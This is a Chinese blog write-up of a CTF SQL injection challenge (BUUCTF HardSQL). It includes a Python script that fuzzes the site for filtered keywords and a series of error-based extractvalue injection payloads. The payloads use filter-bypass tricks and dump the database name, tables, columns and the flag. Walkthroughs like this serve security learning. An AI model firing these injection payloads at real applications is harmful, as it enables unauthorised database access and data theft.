[极客大挑战 2019]HardSQL

最新推荐文章于 2024-04-26 20:19:53 发布
最新推荐文章于 2024-04-26 20:19:53 发布
阅读量148 收藏
点赞数 1
分类专栏: ctf 文章标签: 数据库 database 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38850916/article/details/120889466
版权

基础知识

基于extractvalue()和updatexml()的报错注入

FUZZ测试

写一个python 脚本跑一下屏蔽了什么关键字。

import requests
fuzzdict = open('sqldict.txt').readlines()
#sqldict.txt 存放了测试数据,按行读取
url='http://a247ca21-77c7-4087-b935-b40f8bc38fa1.node4.buuoj.cn:81/check.php'
Passtext = 'Wrong username password'
Failtext = '你可别被我逮住了,臭弟弟'
def Getrequest(dict):
    for i in dict:
        i = i.replace('\n','')
        #print(i)
        payload = url+'?username=test&password='+ i
        #print(payload)
        try:
            res = requests.get(url=payload,timeout=1)
        except:
            print("报错")
        if Passtext in res.text:
            print(i,'没有被过滤')
        if Failtext in res.text:
            print(i,'被过滤')
if __name__ =='__main__':
    Getrequest(fuzzdict)

 没有被屏蔽的关键字有extractvalue ^ concat group where,而且网页可以显示报错信息,在这里选择报错注入

解题过程

爆数据库

因为or关键字也被屏蔽了,所以就使用^代替,空格也被屏蔽了,就使用括号代替

?username=44&password=test'^extractvalue('testtest',concat('^',(select(database()))))%23

爆表名

因为等号‘=’被屏蔽了,所以用like代替

?username=44&password=test%27^extractvalue(%27testtest%27,concat(%27^%27,(select(table_name)from(information_schema.tables)where(table_schema)like%27geek%27)))%23

爆列名

?username=44&password=test%27^extractvalue(%27testtest%27,concat(%27^%27,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like(%27H4rDsq1%27)))))%23

爆表里面的内容(前32位) 

 ?username=44&password=test%27^extractvalue(%27testtest%27,concat(%27~%27,(select(group_concat(id,username,password))from(geek.H4rDsq1))))%23

flag{33b9ea82-e13b-406f-b8

爆表里面的内容(后几位) 

其中substr函数被过滤,使用left进行代替

?username=44&password=test%27^extractvalue(%27testtest%27,concat(%27~%27,right((select(group_concat(id,username,password))from(geek.H4rDsq1)),30)))%23

 -e13b-406f-b83c-1c8d0c60ba36}

Le叶a子f
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
BUUCTF_web_禁止套娃,wp
weixin_54227009的博客
05-10 146
打开靶机之后,f12并没有发现什么, 用dirsearch扫描了一波目录 也并没有发现什么有用的信息 然后GitHack尝试了一下,发现是源码泄露 获得源代码: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'...
今年19,喜欢CTF
m0_74301705的博客
03-29 109
今年19喜欢ctf
BUUCTFHardSQL[极客挑战 2019]
金 帛的博客
06-06 1180
buucft记录贴
非常经典的一道SQL报错注入题目[极客挑战 2019]HardSQL 1(两种解法!)
m0_73734159的博客
11-16 949
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。
buuctf-[极客挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 2874
buuctf-[极客挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
每天一道CTF 第二天
scrawman的博客
03-01 730
今天这个题目很简单,但我还是做了好久。有一些payload之前试了没成功后面再试又可以了,搞得我也很疑惑,不知道自己是不是之前引号没打对还是空格没打对。 进入正题: [极客挑战 2019]EasySQL 题目就告诉我们了是要SQL注入 在用户名和密码分别输入admin’,password,报错显示如下 admin,password’,报错显示如下 admin’,password’,报错显示如下 结合三种情况来看,username使用的是单引号,password使用的是双引号。或者再用admin'#
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
python极客项目编程pdf
03-31
python极客项目编程书籍,很好的一本深入学习python的书籍
【kettle001】访问国产达梦数据库并处理数据至execl文件
kngines
04-22 446
一直以来想写下基于kettle的系列文章,作为较火的数据ETL工具,也是日常项目开发中常用的一款工具,最近刚好挤时间梳理、总结下这块儿的知识体系。熟悉、梳理、总结下达梦(DM)关系型数据库相关知识体系。
探秘MySQL主从复制的多种实现方式
todoitbo的博客
04-26 738
本文将深入探讨MySQL主从复制的多种实现方式,包括基于语句、基于行和混合模式等。无论您是初学者还是有经验的数据库管理员,都能通过本文全面了解MySQL主从复制技术的多样化选择,从而提高数据库的可用性和性能。
mysql-connector-java和spring-boot-starter-jdbc和mybatis-spring-boot-start
xzy的博客
04-23 971
JDBC是使用java语言操作mysql数据库的规范,java语言必须按照这个规范写才可以操作mysql数据库
redis分布式锁到底怎么用
LinggoLing的博客
04-22 459
分布式锁到底怎么用
SpringCloudAlibaba:2.1nacos
最新发布
m0_63040701的博客
04-26 715
Nacos是阿里巴巴开源的服务注册中心以及配置中心Nacos=注册中心Eureka + 服务配置Config + 服务总线Bus。
SpringBoot JPA使用
gochenguowei的博客
04-25 930
是 Spring 框架提供的一个模块,用于简化与关系型数据库的交互和数据访问。它基于JPA(Java Persistence API)标准,并提供了一组易于使用的API和工具,帮助开发人员更轻松地进行数据库操作。通过Spring Data JPA,开发人员可以通过编写简洁的代码来执行常见的 CRUD 操作,同时还支持高级查询、分页、事务管理等功能。它的目标是提供一种更简单、更高效的方式来处理数据库操作,减少开发人员的工作量,并提高应用程序的可维护性和可扩展性。
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值